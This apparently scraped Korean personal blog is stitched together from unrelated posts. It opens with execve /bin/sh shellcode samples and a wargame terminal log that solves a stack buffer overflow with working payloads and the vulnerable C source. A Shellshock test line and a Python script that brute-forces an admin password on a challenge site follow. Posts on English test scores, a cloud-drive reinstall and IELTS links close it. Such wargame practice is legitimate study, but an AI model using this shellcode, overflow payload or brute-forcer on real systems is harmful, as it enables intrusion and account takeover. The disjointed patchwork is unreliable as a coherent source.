BinaryU

Shell Code Sample#1 : /bin/bash

http://dan801114.blog.me/40071161296

\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

Shell Code Sample#2 : /bin/sh

http://kid1412.tistory.com/134

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh

import sys, binascii

f = open(sys.argv[1], 'rb')

data = f.read()

f.close()

tmp = binascii.hexlify(data)

output = open(sys.argv[1] + '_output.jpg', 'wb')

output.write(binascii.unhexlify(tmp[::-1]))

output.close

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from ./do_you_know_bof...(no debugging symbols found)...done.

(gdb) b *bof+43

Breakpoint 1 at 0x8048570

(gdb) r $(python -c 'print "A"*245 + "\x0d\x85\x04\x08"')

Starting program: /home/do_you_know_bof/do_you_know_bof $(python -c 'print "A"*245 + "\x0d\x85\x04\x08"')

[Inferior 1 (process 3428) exited normally]

(gdb) i reg

The program has no registers now.

(gdb)

The program has no registers now.

(gdb)

The program has no registers now.

(gdb)

The program has no registers now.

(gdb) quit

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ ls -al

total 20

drwxr-xr-x 2 root                   root                   4096 Apr  7 15:41 .

drwxr-xr-x 6 root                   root                   4096 Apr  8 02:11 ..

-rwsr-x--- 1 do_you_know_bof_solved do_you_know_bof        7569 Apr  7 15:40 do_you_know_bof

-r--r----- 1 root                   do_you_know_bof_solved   14 Apr  7 15:41 flag

do_you_know_bof@war02:~$ ls -l

total 12

-rwsr-x--- 1 do_you_know_bof_solved do_you_know_bof        7569 Apr  7 15:40 do_you_know_bof

-r--r----- 1 root                   do_you_know_bof_solved   14 Apr  7 15:41 flag

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ cp do_you_know_bof do_you_know_bof

cp: 'do_you_know_bof' and 'do_you_know_bof' are the same file

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ gdb ./do_you_know_bof

GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1

Copyright (C) 2014 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "x86_64-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from ./do_you_know_bof...(no debugging symbols found)...done.

(gdb) b *bof+43

Breakpoint 1 at 0x8048570

(gdb) r $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')

Starting program: /home/do_you_know_bof/do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')

do you know bof?

do you know bof?

Breakpoint 1, 0x08048570 in bof ()

(gdb) i reg

eax            0x11     17

ecx            0xf778d000       -143077376

edx            0xf7782898       -143120232

ebx            0xf7781000       -143126528

esp            0xff86464c       0xff86464c

ebp            0xff864600       0xff864600

esi            0x0      0

edi            0x0      0

eip            0x8048570        0x8048570 <bof+43>

eflags         0x282    [ SF IF ]

cs             0x23     35

ss             0x2b     43

ds             0x2b     43

es             0x2b     43

fs             0x0      0

gs             0x63     99

(gdb) x/32x %ebp

A syntax error in expression, near `%ebp'.

(gdb) x/32x $ebp

0xff864600:     0x41414141      0x41414141      0x41414141      0x41414141

0xff864610:     0x41414141      0x41414141      0x41414141      0x41414141

0xff864620:     0x41414141      0x41414141      0x41414141      0x41414141

0xff864630:     0x41414141      0x41414141      0x41414141      0x41414141

0xff864640:     0x41414141      0x0804850d      0xff864600      0x08048600

0xff864650:     0xff864ceb      0xff864660      0x0000000f      0xf760a42d

0xff864660:     0x795f6f64      0x6b5f756f      0x5f776f6e      0x00666f62

0xff864670:     0x08048610      0x00000000      0x00000000      0xf75f0a83

(gdb) x/x $esp

0xff86464c:     0x08048600

(gdb) quit

A debugging session is active.

        Inferior 1 [process 3500] will be killed.

Quit anyway? (y or n) y

do_you_know_bof@war02:~$ gdb

GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1

Copyright (C) 2014 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "x86_64-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word".

(gdb)

(gdb) quit

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ gdb ./do_you_know_bof

GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1

Copyright (C) 2014 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "x86_64-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from ./do_you_know_bof...(no debugging symbols found)...done.

(gdb) b *bof=43

Invalid cast.

(gdb) b *bof+43

Breakpoint 1 at 0x8048570

(gdb) r $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')

Starting program: /home/do_you_know_bof/do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')

do you know bof?

do you know bof?

Breakpoint 1, 0x08048570 in bof ()

(gdb) i reg

eax            0x11     17

ecx            0xf77bc000       -142884864

edx            0xf77b1898       -142927720

ebx            0xf77b0000       -142934016

esp            0xffff0b9c       0xffff0b9c

ebp            0xffff0b00       0xffff0b00

esi            0x0      0

edi            0x0      0

eip            0x8048570        0x8048570 <bof+43>

eflags         0x286    [ PF SF IF ]

cs             0x23     35

ss             0x2b     43

ds             0x2b     43

es             0x2b     43

fs             0x0      0

gs             0x63     99

(gdb) disas $eip

Dump of assembler code for function bof:

   0x08048545 <+0>:     push   %ebp

   0x08048546 <+1>:     mov    %esp,%ebp

   0x08048548 <+3>:     sub    $0x118,%esp

   0x0804854e <+9>:     mov    0x8(%ebp),%eax

   0x08048551 <+12>:    mov    %eax,0x4(%esp)

   0x08048555 <+16>:    lea    -0x108(%ebp),%eax

   0x0804855b <+22>:    mov    %eax,(%esp)

   0x0804855e <+25>:    call   0x8048390 <strcpy@plt>

   0x08048563 <+30>:    movl   $0x80486c1,(%esp)

   0x0804856a <+37>:    call   0x80483a0 <puts@plt>

   0x0804856f <+42>:    leave

=> 0x08048570 <+43>:    ret

End of assembler dump.

(gdb) x/32x $ebp

0xffff0b00:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b10:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b20:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b30:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b40:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b50:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b60:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b70:     0x41414141      0x41414141      0x41414141      0x41414141

(gdb) x/32x $esp

0xffff0b9c:     0x08048600      0xffff2ceb      0xffff0bb0      0x0000000f

0xffff0bac:     0xf763942d      0x795f6f64      0x6b5f756f      0x5f776f6e

0xffff0bbc:     0x00666f62      0x08048610      0x00000000      0x00000000

0xffff0bcc:     0xf761fa83      0x00000002      0xffff0c64      0xffff0c70

0xffff0bdc:     0xf77cecea      0x00000002      0xffff0c64      0xffff0c04

0xffff0bec:     0x0804a020      0x0804826c      0xf77b0000      0x00000000

0xffff0bfc:     0x00000000      0x00000000      0x5cf357f1      0x611073e0

0xffff0c0c:     0x00000000      0x00000000      0x00000000      0x00000002

(gdb) x/32x $esp-0x10

0xffff0b8c:     0x41414141      0x41414141      0x0804850d      0xffff0b00

0xffff0b9c:     0x08048600      0xffff2ceb      0xffff0bb0      0x0000000f

0xffff0bac:     0xf763942d      0x795f6f64      0x6b5f756f      0x5f776f6e

0xffff0bbc:     0x00666f62      0x08048610      0x00000000      0x00000000

0xffff0bcc:     0xf761fa83      0x00000002      0xffff0c64      0xffff0c70

0xffff0bdc:     0xf77cecea      0x00000002      0xffff0c64      0xffff0c04

0xffff0bec:     0x0804a020      0x0804826c      0xf77b0000      0x00000000

0xffff0bfc:     0x00000000      0x00000000      0x5cf357f1      0x611073e0

(gdb) quit

A debugging session is active.

        Inferior 1 [process 3565] will be killed.

Quit anyway? (y or n) y

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ ./do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*253 + "\x0d\x85\x04\x08"')

do you know bof?

do you know bof?

Its_show_time

do_you_know_bof@war02:~$ ./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`

do_you_know_bof@war02:~$ ./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`

do you know bof?

do you know bof?

Its_show_time

do_you_know_bof@war02:~$ ./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"x0d850408";'`

do you know bof?

do you know bof?

Segmentation fault

do_you_know_bof@war02:~$ ^C

do_you_know_bof@war02:~$ ./do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*253 + "\x0d\x85\x04\x08"')

do you know bof?

do you know bof?

Its_show_time

do_you_know_bof@war02:~$

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

void goingflag(){

   execl("/bin/cat", "/bin/cat", "/home/prob/flag", 0);

   printf("Good :)\n");

}

void bof(char *str){

   char buf[256];

   strcpy(buf, str);

   printf("do you know bof?\n");

}

int main(int argc, char *argv[]){

   char cmp[]="do_you_know_bof";

   if(argc != 2){

      exit(0);

   }

   if(strncmp(argv[1], cmp, strlen(cmp)) != 0){

      exit(0);

   }

   printf("do you know bof?\n");

   bof(argv[1]);

}

256-15+4=245 + dummy8 = 253

./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`

./do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*253 + "\x0d\x85\x04\x08"')

정보통신망 이용촉진 및 정보보호 등에 관한 법률.pdf

env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'

import urllib

import httplib

import urllib2

import re

def Search():

#print BlindList[blind]

print "========== Suninatas Brute Forcing!!! ==========\n"

for number in range(0,10000):

Attack = "suninatas.com"

conn = httplib.HTTPConnection(Attack)

post_param = urllib.urlencode({'id':'admin','pw':number})

headers = {'Cookie':"ASPSESSIONIDQSQAABST=HNFFFDAAMADPLEOAHBLGNFIG; auth%5Fkey=%3F%3F%3F%3F%3F"}

conn.request('POST','/Part_one/web08/web08.asp',post_param, headers)

response = conn.getresponse()

ok = re.findall("Incorrect!",response.read())

#print read

if ok:

f = open('su7_v1.txt','a')

f.write("Password Search!! ->"+str(number)+"\n")

print "Password search!! -> %d"%(number)

f.close()

else:

f = open('su7_v1.txt','a')

f.write("\n\n\nPassword Crack!! ->"+str(number)+"\n\n\n")

print "\n#######Password Crack!!####### -> %d\n"%number

f.close()

Search()

우연한 기회에 i-TEPS를 무료로 응시할 수 있는 기회과 생겨서 시험을 봤다.

계속 토익만 공부하면서, Speaking과 Writing분야 시험은 처음이라 궁금했다.

이런 TEPS 협회까지 가서 공식적으로 본건데도, 성적표는 공식 성적표가 안 나오네...

아무튼, 점수는 208점... 어느정도 점수인지 잘 모르겠지만...

i-TEPS 점수를 TEPS 점수로 환산하고, 다시 TEPS 점수를 TOEIC 점수로 환산하니,

약 670점이 나왔다.

기존 토익 최고점수가 610점이었으니, i_TEPS 점수가 좀 더 잘 나오는거 같다.

정식 성적표가 안 나오니, 나중에 점수 참고를 위해 여기다 기록해 놓아야 겠다.

ㅇ 총점 208점

  - 청해          : 38점/80점

  - 문법/어휘 : 19점/40점

  - 독해          : 25점/80점

  - 말하기      : 66점/100점

  - 쓰기          : 60점/100점

ㅇ 기능별 100점만점으로 환산하면...

  - 청해          : 47.5점

  - 문법/어휘 : 47.5점

  - 독해          : 31.25점

  - 말하기      : 66점

  - 쓰기          : 60점

오우, 이 분위기면 그냥 TOEIC 스피킹으로 점수 올리는게 가장 빠르겠다...

맥용 N드라이브가 로그인이 안될때는 재설치를 해야 한다.

그러나, N드라이브 설치파일을 다운 받아 재설치를 하려고 디스크가 깨졌다고 나온다.

이것은, 애플의 정책 변경때문이라고 한다.

해결 방법은 환경설정에서 보안으로 들어가서 아래와 같이 "다음에서 다운로드한 App 허용"을 모든 곳으로 변경한다음 재설치를 진행한다.

그러나, 아마 여전히 로그인이 안 될 것이다...

왜냐하면...

N드라이브 삭제시 그냥 app만 삭제하면 지워지지 않고 남아있던 찌꺼기 파일들에 들어있는 설정 값때문이다.

AppCleaner 라는 앱으로 다시 N드라이브 앱을 깨끗이 지우고 다시 설치하면 잘 된다.

- A site with speaking exercises, explanations and tips.
http://www.ieltsspeaking.co.uk/speaking-practice/

- Great general site, but also has useful exercises for IELTS writing and vocabulary.
http://www.dcielts.com/ielts-vocabulary/awl-exercises/awl-list-2-words-and-exercises/

- The best IELTS site for information. Has some good exercises for speaking and writing.
https://www.teachers.cambridgeesol.org/ts/exams/academicandprofessional/ielts

- OK general IELTS site. I use it mostly for vocabulary and idioms.
http://www.ieltsbuddy.com/idioms.html